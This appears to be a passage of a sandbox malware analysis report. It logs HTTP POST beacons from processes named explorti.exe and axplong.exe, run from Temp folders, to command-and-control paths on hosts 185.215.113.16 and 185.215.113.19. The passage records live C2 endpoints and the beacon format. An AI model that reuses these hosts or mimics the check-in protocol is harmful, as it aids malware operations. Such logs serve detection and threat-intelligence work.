Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:55.028496981 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:55.875216961 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:55.875792980 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:56.142071962 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	64177	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:56.263566971 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:57.049213886 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:57.049689054 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:57.313819885 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	64178	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:56.263792992 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:57.047477961 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:57.048156977 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:57.304501057 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	64179	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:57.422368050 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:58.185337067 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:58.189038992 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:58.440316916 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	64180	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:57.443540096 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:58.207103968 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:58.209661961 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:58.456458092 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	64183	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:58.561544895 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:59.300723076 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:59.301603079 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:59.550904989 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.5	64184	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:58.577086926 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:59.318872929 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:59.322405100 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:59.567920923 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	64185	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:59.669158936 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:11:00.441055059 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:11:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:11:00.442183018 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:11:00.690828085 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:11:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	64186	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:59.682533026 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:11:00.465574026 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:11:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:11:00.468333006 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:11:00.713546038 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:11:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.5	64200	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:11:00.807662010 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:11:01.576304913 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:11:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:11:01.602097988 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:11:01.870043993 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:11:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	64201	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:11:00.831895113 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:11:01.624833107 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:11:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:11:01.673590899 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:11:01.937325001 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:11:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	64224	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:11:02.051337004 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:11:02.837901115 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:11:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:11:02.840008974 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:11:03.094772100 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:11:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.5	64225	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:11:02.139306068 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:11:02.895467997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:11:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:11:02.902381897 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: 